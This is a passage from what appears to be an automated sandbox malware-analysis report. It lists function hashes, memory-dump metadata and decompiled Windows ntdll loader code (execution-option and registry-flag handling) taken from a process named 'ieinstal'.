                                                                                                                • Opcode Fuzzy Hash: afa09cd190d1164d2add6261655f5ba51b17448ac0c8f741c656683231ccbe30
                                                                                                                • Instruction Fuzzy Hash: 73900231A0110413D5156559460870B410947D0651FD5C916A1424518DDA668D52F121
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 13 1e692dc0-1e692dcc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a91cdd9b02d6179321886299098819fe2dee9c754c33cb52cf65fab29246965b
                                                                                                                • Instruction ID: 9a6da378f264ec41a091209754ee2ba21f274c4e2eeb268dc9f65c8ed47fc918
                                                                                                                • Opcode Fuzzy Hash: a91cdd9b02d6179321886299098819fe2dee9c754c33cb52cf65fab29246965b
                                                                                                                • Instruction Fuzzy Hash: DB900271A0110402D5447559450874A410547D0711FD5C515A6064514ECA698DD5B665
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692DA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 12 1e692da0-1e692dac LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: cfd7e02c45d49d5584b953ff8d67161f486e11f760c8b240d4512dbd01aee13f
                                                                                                                • Instruction ID: db963ccd5ac797d3e444af573d1f58fa388203ea7f97b92de8ccdd9c73f73076
                                                                                                                • Opcode Fuzzy Hash: cfd7e02c45d49d5584b953ff8d67161f486e11f760c8b240d4512dbd01aee13f
                                                                                                                • Instruction Fuzzy Hash: 24900221E0110502D5057559450861A410A47D0651FD5C526A2024515ECE358D92F131
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 5 1e692b10-1e692b1c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 053e5bb8db3da0dfadc4207f79936b023550e50178340901cdf144da85719613
                                                                                                                • Instruction ID: 551bd316d8749bf9e83781d1c7804120343b456cfbf30dfb2c7fafeb95be6afd
                                                                                                                • Opcode Fuzzy Hash: 053e5bb8db3da0dfadc4207f79936b023550e50178340901cdf144da85719613
                                                                                                                • Instruction Fuzzy Hash: 53900231A0110802D5847559450864E410547D1711FD5C519A1025614DCE258E59B7A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 7 1e692bc0-1e692bcc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f9a862b807d90fbc5bb0b59dd8164bdb75b502ab5bbd7a8e3898b3cf02a46315
                                                                                                                • Instruction ID: bbd18f7c13e07e0bd79f630d42293a96fbea7fb8b56bfe9307e05dee1ce941b2
                                                                                                                • Opcode Fuzzy Hash: f9a862b807d90fbc5bb0b59dd8164bdb75b502ab5bbd7a8e3898b3cf02a46315
                                                                                                                • Instruction Fuzzy Hash: 90900231A0110402D5046999550C64A410547E0711FD5D515A6024515ECA758C91B131
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 6 1e692b90-1e692b9c LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 947716019622acb266da6cd13af1cfe7099eec5182c256c6dfae495d5e264aa3
                                                                                                                • Instruction ID: 1b6fece7a32e0ce3119c68dddb85486eaa45ecb1e5a7ee4ac2c4d1bb5a249b40
                                                                                                                • Opcode Fuzzy Hash: 947716019622acb266da6cd13af1cfe7099eec5182c256c6dfae495d5e264aa3
                                                                                                                • Instruction Fuzzy Hash: 8D900231A0118802D5146559850874E410547D0711FD9C915A5424618DCAA58C91B121
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E6929F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 4 1e6929f0-1e6929fc LdrInitializeThunk
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a6214d119d3d02ddabd1c871775de6d0d0432c0938d0394c49264a57ec1743ea
                                                                                                                • Instruction ID: 148d274ef7b735d4c318bb28590d1984ddc16388aeb396c251dba5e7adce258e
                                                                                                                • Opcode Fuzzy Hash: a6214d119d3d02ddabd1c871775de6d0d0432c0938d0394c49264a57ec1743ea
                                                                                                                • Instruction Fuzzy Hash: 99900225A11100030509A959070850B414647D57613D5C525F2015510CDA318C61A121
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1E692B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 1e692b2a-1e692b2f 1 1e692b3f-1e692b46 LdrInitializeThunk 0->1 2 1e692b31-1e692b38 0->2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.25362857364.000000001E620000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E620000, based on PE: true
                                                                                                                • Associated: 00000007.00000002.25368869920.000000001E749000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000007.00000002.25369083321.000000001E74D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_1e620000_ieinstal.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: c1c28b08ce946cf1268f8098efdc8647bcf1a19d491d30a034d65d582fb00e0c
                                                                                                                • Instruction ID: ab56ba466f7c751ac4e2dc7feee71992c965d718e08cc90d073bd5feff7fe57d
                                                                                                                • Opcode Fuzzy Hash: c1c28b08ce946cf1268f8098efdc8647bcf1a19d491d30a034d65d582fb00e0c
                                                                                                                • Instruction Fuzzy Hash: 81B09272D025C6CAEA05EB605B0CB0BBB457BD1B15FAAC666E3470641E8B38C491F276
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 1E6D1FC9 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1E6D1FC9(signed int __ecx, signed int __edx, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, signed int _a16, char _a23, signed int _a24, signed int _a28, signed int _a32, char _a36, signed int _a40, signed int _a44, void* _a48, signed int _a56, signed int _a60, signed int _a64, char _a68, char _a72, short _a74, intOrPtr _a76, char _a80, short _a82, intOrPtr _a84, char _a88, short _a90, intOrPtr _a92, char _a96, short _a98, intOrPtr _a100, char _a104, short _a106, intOrPtr _a108, void* _a112, signed int* _a116, signed int* _a120, char _a124, short _a126, char* _a128, intOrPtr _a132, signed int _a136, signed int _a140, char _a144, signed int _a148, intOrPtr _a152, intOrPtr _a156, signed int _a160, signed int _a164, char _a168, char _a176, char _a1200, char _a2224, char _a3248, char _a4272, char _a5296, char _a5328, signed int _a5724) {
				void* _v0;
				signed int _v4;
				signed int _v12;
				signed int _v16;
				intOrPtr _v24;
				signed int _v72;
				intOrPtr _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t392;
				signed int _t399;
				signed char _t407;
				signed int _t409;
				short _t412;
				signed int _t420;
				signed int _t422;
				void* _t427;
				intOrPtr _t435;
				intOrPtr _t452;
				signed int _t454;
				signed int _t457;
				signed int _t463;
				signed int _t465;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t475;
				intOrPtr _t477;
				signed int _t482;
				intOrPtr _t483;
				signed int _t484;
				void* _t504;
				intOrPtr _t506;
				signed int _t511;
				intOrPtr _t512;
				intOrPtr _t538;
				signed int _t540;
				intOrPtr _t543;
				void* _t569;
				intOrPtr _t571;
				signed int _t573;
				intOrPtr _t576;
				intOrPtr _t602;
				signed int _t604;
				intOrPtr _t607;
				void* _t634;
				signed int* _t638;
				signed int* _t639;
				void* _t640;
				signed int _t641;
				char _t642;
				signed int* _t644;
				intOrPtr _t657;
				signed int _t663;
				signed int _t667;
				void* _t668;
				intOrPtr _t669;
				signed int _t670;
				void* _t676;
				signed int _t690;
				signed int _t691;
				void* _t692;
				signed int _t693;
				signed int _t694;
				signed int _t695;
				signed int _t696;
				signed int _t697;
				signed int _t699;
				void* _t701;
				signed int _t703;
				void* _t707;
				signed int _t708;
				signed int _t709;
				signed int _t710;
				signed int _t711;
				signed int _t712;
				signed int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t717;
				signed int _t718;
				signed int _t719;

				_t719 = _t718 & 0xfffffff8;
				E1E6964E0(0x1664);
				_a5724 =  *0x1e74b370 ^ _t719;
				_a8 = __edx;
				_a60 = __ecx;
				_t644 = _a8;
				_a132 = _a4;
				_t392 = _a12;
				_a140 = _a16;
				 *_t644 = 0;
				_t637 = 0;
				_a120 = _t392;
				_t699 = 0;
				 *_t392 = 0;
				_t690 = 0;
				_a116 = _t644;
				_a68 = 0;
				_v4 = 0;
				_a44 = 0;
				_a64 = 0;
				_a56 = 0;
				_a23 = 1;
				_a16 = 0;
				_a112 = 0;
				E1E6D1F45();
				if(( *( *((intOrPtr*)(_a8 + 0x10)) + 8) & 0x00004000) != 0) {
					L189:
					__eflags = E1E670130();
					if(__eflags != 0) {
						_t699 = _t699 | 0x00000001;
						__eflags = _t699;
					}
					_t646 = _t699;
					_t675 =  *( *((intOrPtr*)(_a8 + 0x10)) + 8);
					E1E6F722B( *( *((intOrPtr*)(_a8 + 0x10)) + 8), __eflags);
					__eflags = _a23;
					if(_a23 != 0) {
						__eflags =  *0x1e745d70;
						if( *0x1e745d70 == 0) {
							__eflags =  *0x7ffe03a0 & 0x00000001;
							if(( *0x7ffe03a0 & 0x00000001) != 0) {
								_t646 = _a60;
								_t420 = E1E6D8A07(_t637, _a60,  &_a44);
								__eflags = _t420;
								if(_t420 < 0) {
									_t347 =  &_a44;
									 *_t347 = _a44 & 0x00000000;
									__eflags =  *_t347;
								} else {
									_t422 = E1E646CC0(_a44, L"GlobalFlag", 4,  &_a40, 4, 0);
									__eflags = _t422;
									if(_t422 >= 0) {
										 *(_a8 + 0x68) =  *(_a8 + 0x68) | _a40 & 0x02000100;
										_a16 = _a44;
									}
								}
							}
						}
					}
					_t399 = _a8;
					_t700 = 0;
					__eflags =  *(_t399 + 0x68) & 0x02000100;
					if(( *(_t399 + 0x68) & 0x02000100) != 0) {
						L212:
						_t691 = _a8;
						_t675 = _t691;
						_t700 = E1E6D1DD8(_a60, _t691, _a68, _a16, _a132, _a140);
						__eflags = _t700;
						if(_t700 >= 0) {
							goto L206;
						}
						_t407 =  *0x1e7437c0; // 0x0
						__eflags = _t407 & 0x00000003;
						if((_t407 & 0x00000003) != 0) {
							E1E6CE692("minkernel\\ntdll\\ldrinit.c", 0x2005, "LdrpInitializeExecutionOptions", 0, "Initializing the application verifier package failed with status 0x%08lx\n", _t700);
							_t407 =  *0x1e7437c0; // 0x0
							_t719 = _t719 + 0x18;
						}
						__eflags = _t407 & 0x00000010;
						if((_t407 & 0x00000010) != 0) {
							asm("int3");
						}
						goto L208;
					} else {
						_t409 = E1E6D36EC();
						__eflags = _t409;
						if(_t409 != 0) {
							goto L212;
						}
						__eflags = _t690;
						_t691 = _a8;
						if(_t690 != 0) {
							L206:
							__eflags =  *(_t691 + 0x478) & 0x00000001;
							if(( *(_t691 + 0x478) & 0x00000001) != 0) {
								_t368 = _t691 + 0x474;
								 *_t368 =  *(_t691 + 0x474) | 0x00000001;
								__eflags =  *_t368;
							}
							L208:
							__eflags = _t700;
							if(_t700 < 0) {
								L217:
								_t638 = _a116;
								__eflags =  *_t638;
								if( *_t638 != 0) {
									_push( *_t638);
									E1E692A80();
									 *_t638 =  *_t638 & 0x00000000;
									__eflags =  *_t638;
								}
								_t639 = _a120;
								__eflags =  *_t639;
								if( *_t639 != 0) {
									_push( *_t639);
									E1E692A80();
									 *_t639 =  *_t639 & 0x00000000;
									__eflags =  *_t639;
								}
								L221:
								__eflags = _a44;
								if(_a44 != 0) {
									_push(_a44);
									E1E692A80();
								}
								_pop(_t692);
								_pop(_t701);
								_pop(_t640);
								__eflags = _a5724 ^ _t719;
								return E1E694B50(_t700, _t640, _a5724 ^ _t719, _t675, _t692, _t701);
							}
							E1E6D395B(_t637);
							goto L221;
						}
						__eflags = _t637;
						if(_t637 != 0) {
							goto L206;
						}
						__eflags =  *((intOrPtr*)(_t691 + 2)) - _t637;
						if( *((intOrPtr*)(_t691 + 2)) == _t637) {
							goto L206;
						}
						_a128 =  &_a5296;
						_a124 = 0;
						_t412 = 0x20;
						_a126 = _t412;
						__eflags = E1E67B130(_t646,  *((intOrPtr*)( *((intOrPtr*)(_t691 + 0x10)) + 0x48)), 0x1e621a40,  &_a124);
						if(__eflags < 0) {
							_t700 = 0;
							__eflags = 0;
							L211:
							 *(_t691 + 0x68) =  *(_t691 + 0x68) | 0x00000070;
							goto L206;
						}
						_push( &_v0);
						_push(_t637);
						_push( &_a124);
						_t700 = E1E6807D0(_t637, _t691, 0, __eflags);
						__eflags = _t700;
						if(_t700 < 0) {
							goto L211;
						}
						__eflags = _v12 - _t637;
						if(_v12 == _t637) {
							goto L211;
						}
						goto L206;
					}
				}
				_t651 = _a60;
				_push( &_v4);
				_push(0);
				_t676 = 9;
				_t427 = E1E685E29(_a60, _t676);
				_t637 = _v12;
				if(_t427 < 0) {
					goto L189;
				} else {
					_t703 = _a8;
					 *_a116 = _t637;
					if(( *(_t703 + 3) & 0x00000010) != 0) {
						_t651 =  &_a5328;
						if(E1E6D1A93( &_a5328, _t676) >= 0) {
							E1E695050( &_a5328,  &_a168,  &_a5328);
							_t651 =  &_a160;
							_t634 = E1E6DFEBB( &_a160, _t637,  &_a48);
							_t690 = _a44;
							if(_t634 >= 0) {
								 *_a120 = _t690;
							}
						}
					}
					E1E646C5D(_t690, _t637, L"DisableHeapLookaside", 4, 0x1e746934, 4, _t651, 0);
					E1E646C5D(_t690, _t637, L"FrontEndHeapDebugOptions", 4,  &_a40, 4, _t690, 0);
					E1E646C5D(_t690, _t637, L"ShutdownFlags", 4, 0x1e746944, 4, _t690, 0);
					_v72 = _v72 & 0x00000000;
					_t655 = _t690;
					E1E646C5D(_t690, _t637, L"UnloadEventTraceDepth", 4,  &_v72, 4, _t690, 0);
					_t435 = _v96;
					if(_t435 != 0) {
						 *0x1e743918 = _t435;
					}
					_v0 = _v0 & 0x00000000;
					E1E646C5D(_t690, _t637, L"MaxLoaderThreads", 4,  &_v0, 4, _t655, 0);
					_t657 = _v24;
					if(_t657 != 0) {
						 *((intOrPtr*)( *((intOrPtr*)(_t703 + 0x10)) + 0x2a0)) = _t657;
					}
					_v0 = _v0 & 0x00000000;
					_t658 = _t690;
					E1E646C5D(_t690, _t637, L"UseImpersonatedDeviceMap", 4,  &_v0, 4, _t657, 0);
					if(_v24 != 0) {
						 *0x1e745d58 = 1;
					}
					_v0 = _v0 & 0x00000000;
					E1E646C5D(_t690, _t637, L"TracingFlags", 4,  &_v0, 4, _t658, 0);
					_t660 = _v24;
					if(_v24 != 0) {
						asm("lock or [eax], ecx");
					}
					_v0 = _v0 & 0x00000000;
					_t675 = _t637;
					_t661 = _t690;
					if(E1E646C5D(_t690, _t637, L"RaiseExceptionOnPossibleDeadlock", 4,  &_v0, 4, _t660, 0) >= 0) {
						 *0x1e744ae1 = _v0 != 0;
					}
					_a48 = _a48 & 0x00000000;
					if(E1E671D10( &_a72, L"ExecuteOptions") < 0) {
						L45:
						if(E1E671D10( &_a80, L"DisableExceptionChainValidation") < 0) {
							L81:
							if(_a48 != 0) {
								_push(4);
								_push( &_a48);
								_push(0x22);
								_push(0xffffffff);
								E1E692B70();
							}
							L83:
							_v0 = _v0 & 0x00000000;
							if(E1E671D10( &_a88, L"CFGOptions") < 0) {
								L114:
								if(( *(_a8 + 3) & 0x00000001) == 0) {
									L119:
									if(E1E671D10( &_a96, L"MinimumStackCommitInBytes") < 0) {
										L143:
										_t663 = _a8;
										_t452 = _v0;
										if( *((intOrPtr*)(_t663 + 0x208)) < _t452) {
											 *((intOrPtr*)(_t663 + 0x208)) = _t452;
										}
										_t707 = 0;
										while(1) {
											_v0 = _v0 & 0x00000000;
											_t250 = _t707 + 0x1e621a60; // 0x0
											_t454 = E1E646CC0(_t637,  *_t250, 4,  &_v0, 4, 0);
											_t252 = _t707 + 0x1e621a64; // 0x0
											_t664 =  *_t252;
											_t707 = _t707 + 8;
											 *( *_t252) = _t454 & 0xffffff00 | _v24 != 0x00000000;
											if(_t707 == 0x18) {
												break;
											}
											_t637 = _v4;
										}
										_v0 = _v0 & 0x00000000;
										_t457 = E1E671D10( &_a104, L"MaxDeadActivationContexts");
										__eflags = _t457;
										if(_t457 < 0) {
											L173:
											_t637 = _v4;
											L174:
											_t708 = _a8;
											_t690 = _a56;
											_a12 =  *(_t708 + 0x68) >> 0x00000008 & 0xffffff01;
											_t665 = _t690;
											_t463 = E1E646C5D(_t690, _t637, L"GlobalFlag", 4,  &_a40, 4, _t664,  &_a112);
											__eflags = _t463;
											if(_t463 < 0) {
												L184:
												_t465 = E1E646C5D(_t690, _t637, L"GlobalFlag2", 4,  &_a40, 4, _t665, 0);
												__eflags = _t465;
												if(_t465 >= 0) {
													 *((intOrPtr*)(_t708 + 0x478)) = _a40;
												}
												__eflags =  *(_t708 + 0x68) & 0x02000100;
												_t699 = _a64;
												_a68 = _a12;
												if(( *(_t708 + 0x68) & 0x02000100) == 0) {
													_t329 =  &_a16;
													 *_t329 = _a16 & 0x00000000;
													__eflags =  *_t329;
												} else {
													_a23 = 0;
													_a16 = _a112;
												}
												goto L189;
											}
											_t709 = _a40;
											__eflags = _t709 & 0x02000100;
											if((_t709 & 0x02000100) == 0) {
												L182:
												_t469 = _a8;
												 *(_t469 + 0x68) = _t709;
												_t708 = _t469;
												goto L184;
											}
											_t665 = _a8;
											_t470 = E1E6D3152(_a8, _t690, _t637);
											__eflags = _t470;
											if(_t470 == 0) {
												_t709 = _t709 & 0xfdfffeff;
												__eflags = _t709;
												_a40 = _t709;
											}
											__eflags = _t709 & 0x02000100;
											if((_t709 & 0x02000100) != 0) {
												_t665 = _a60;
												_t471 = E1E6D3881(_a60,  &_a136);
												__eflags = _t471;
												if(_t471 < 0) {
													_t708 = _a8;
													goto L184;
												}
												__eflags = _a136;
												if(_a136 == 0) {
													_t709 = _t709 & 0xfdfffeff;
													__eflags = _t709;
													_a40 = _t709;
												}
											}
											goto L182;
										}
										_t637 = _v4;
										_push( &_a16);
										_push(0x400);
										_t710 =  &_a4272;
										_push(_t710);
										_push(2);
										_push( &_a104);
										_push(_t637);
										_t475 = E1E692B00();
										__eflags = _t475;
										if(_t475 < 0) {
											__eflags = _t475 - 0x80000005;
											if(_t475 != 0x80000005) {
												goto L174;
											} else {
												goto L157;
											}
											while(1) {
												L157:
												_t641 = _a16;
												_t664 =  *( *[fs:0x30] + 0x18);
												__eflags = _t664;
												if(_t664 == 0) {
													goto L173;
												}
												_t477 =  *0x1e745d78; // 0x0
												_t693 = E1E665D90(_t664, _t664, _t477 + 0x180000, _a16);
												__eflags = _t693;
												if(_t693 == 0) {
													goto L173;
												}
												_t710 = _t693;
												_push( &_a16);
												_push(_t641);
												_t637 = _v4;
												_push(_t693);
												_push(2);
												_push( &_a104);
												_push(_t637);
												_t482 = E1E692B00();
												__eflags = _t482;
												if(_t482 >= 0) {
													L151:
													_t483 =  *((intOrPtr*)(_t710 + 4));
													__eflags = _t483 - 3;
													if(_t483 == 3) {
														L166:
														_t664 = 4;
														__eflags = _t483 - _t664;
														if(_t483 == _t664) {
															_a16 =  *((intOrPtr*)(_t710 + 8));
															__eflags =  *((intOrPtr*)(_t710 + 8)) - _t664;
															if( *((intOrPtr*)(_t710 + 8)) <= _t664) {
																_t291 = _t710 + 0xc; // 0xc
																E1E6988C0( &_v0, _t291,  *((intOrPtr*)(_t710 + 8)));
																_t719 = _t719 + 0xc;
															}
														}
														L169:
														__eflags = _t693;
														if(_t693 != 0) {
															E1E663BC0( *( *[fs:0x30] + 0x18), 0, _t693);
															_t637 = _v16;
														}
														_t484 = _v0;
														__eflags = _t484;
														if(_t484 != 0) {
															 *0x1e743940 = _t484;
														}
														goto L174;
													}
													__eflags = _t483 - 7;
													if(_t483 == 7) {
														goto L166;
													}
													_t664 = 4;
													__eflags = _t483 - _t664;
													if(_t483 != _t664) {
														__eflags = _t483 - 0xb;
														if(_t483 != 0xb) {
															__eflags = _t483 - 1;
															if(_t483 == 1) {
																__eflags =  &_v0 & 0x00000003;
																if(__eflags == 0) {
																	_t278 = _t710 + 0xc; // 0xc
																	_a16 = _t664;
																	_a108 = _t278;
																	_a104 =  *((intOrPtr*)(_t710 + 8));
																	_a106 =  *((intOrPtr*)(_t710 + 8));
																	_push( &_v0);
																	_push(0);
																	_push( &_a104);
																	E1E6807D0(_t637, _t693, _t710, __eflags);
																}
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t710 + 8)) - _t664;
														if( *((intOrPtr*)(_t710 + 8)) == _t664) {
															_a16 = _t664;
															_v0 =  *((intOrPtr*)(_t710 + 0xc));
														}
													}
													goto L169;
												}
												__eflags = _t482 - 0x80000005;
												if(_t482 != 0x80000005) {
													goto L169;
												}
												E1E663BC0( *( *[fs:0x30] + 0x18), 0, _t693);
											}
											goto L173;
										}
										_t693 = 0;
										__eflags = 0;
										goto L151;
									}
									_push( &_a36);
									_push(0x400);
									_t711 =  &_a3248;
									_push(_t711);
									_push(2);
									_push( &_a96);
									_push(_t637);
									_t504 = E1E692B00();
									if(_t504 < 0) {
										__eflags = _t504 - 0x80000005;
										if(_t504 != 0x80000005) {
											goto L143;
										} else {
											goto L128;
										}
										while(1) {
											L128:
											_t642 = _a36;
											_t667 =  *( *[fs:0x30] + 0x18);
											__eflags = _t667;
											if(_t667 == 0) {
												break;
											}
											_t506 =  *0x1e745d78; // 0x0
											_t694 = E1E665D90(_t667, _t667, _t506 + 0x180000, _a36);
											__eflags = _t694;
											if(_t694 == 0) {
												break;
											}
											_t711 = _t694;
											_push( &_a36);
											_push(_t642);
											_t637 = _v4;
											_push(_t694);
											_push(2);
											_push( &_a96);
											_push(_v4);
											_t511 = E1E692B00();
											__eflags = _t511;
											if(_t511 >= 0) {
												L122:
												_t512 =  *((intOrPtr*)(_t711 + 4));
												if(_t512 == 3 || _t512 == 7) {
													_t668 = 4;
													__eflags = _t512 - _t668;
													if(_t512 == _t668) {
														_a36 =  *((intOrPtr*)(_t711 + 8));
														__eflags =  *((intOrPtr*)(_t711 + 8)) - _t668;
														if( *((intOrPtr*)(_t711 + 8)) <= _t668) {
															_t239 = _t711 + 0xc; // 0xc
															E1E6988C0( &_v0, _t239,  *((intOrPtr*)(_t711 + 8)));
															_t719 = _t719 + 0xc;
														}
													}
												} else {
													_t669 = 4;
													if(_t512 != _t669) {
														__eflags = _t512 - 0xb;
														if(_t512 != 0xb) {
															__eflags = _t512 - 1;
															if(_t512 == 1) {
																__eflags =  &_v0 & 0x00000003;
																if(__eflags == 0) {
																	_t226 = _t711 + 0xc; // 0xc
																	_a36 = _t669;
																	_a100 = _t226;
																	_a96 =  *((intOrPtr*)(_t711 + 8));
																	_a98 =  *((intOrPtr*)(_t711 + 8));
																	_push( &_v0);
																	_push(0);
																	_push( &_a96);
																	E1E6807D0(_t637, _t694, _t711, __eflags);
																}
															}
														}
													} else {
														if( *((intOrPtr*)(_t711 + 8)) == _t669) {
															_a36 = _t669;
															_v0 =  *((intOrPtr*)(_t711 + 0xc));
														}
													}
												}
												L140:
												if(_t694 == 0) {
													goto L143;
												}
												E1E663BC0( *( *[fs:0x30] + 0x18), 0, _t694);
												break;
											}
											__eflags = _t511 - 0x80000005;
											if(_t511 != 0x80000005) {
												goto L140;
											}
											E1E663BC0( *( *[fs:0x30] + 0x18), 0, _t694);
										}
										_t637 = _v4;
										goto L143;
									}
									_t694 = 0;
									goto L122;
								}
								_a160 = _a160 & 0x00000000;
								_a164 = _a164 & 0x00000000;
								_push( &_a144);
								_push(1);
								_push(0x1e745a98);
								_a144 = 0x18;
								_a148 = _t637;
								_a156 = 0x40;
								_a152 = 0x1e621a38;
								_t700 = E1E692AB0();
								if(_t700 != 0xc0000034) {
									__eflags = _t700;
									if(_t700 < 0) {
										goto L217;
									}
									goto L119;
								}
								 *0x1e745a98 =  *0x1e745a98 & 0x00000000;
								goto L119;
							}
							_push( &_a32);
							_push(0x400);
							_t695 =  &_a2224;
							_push(_t695);
							_push(2);
							_push( &_a88);
							_push(_t637);
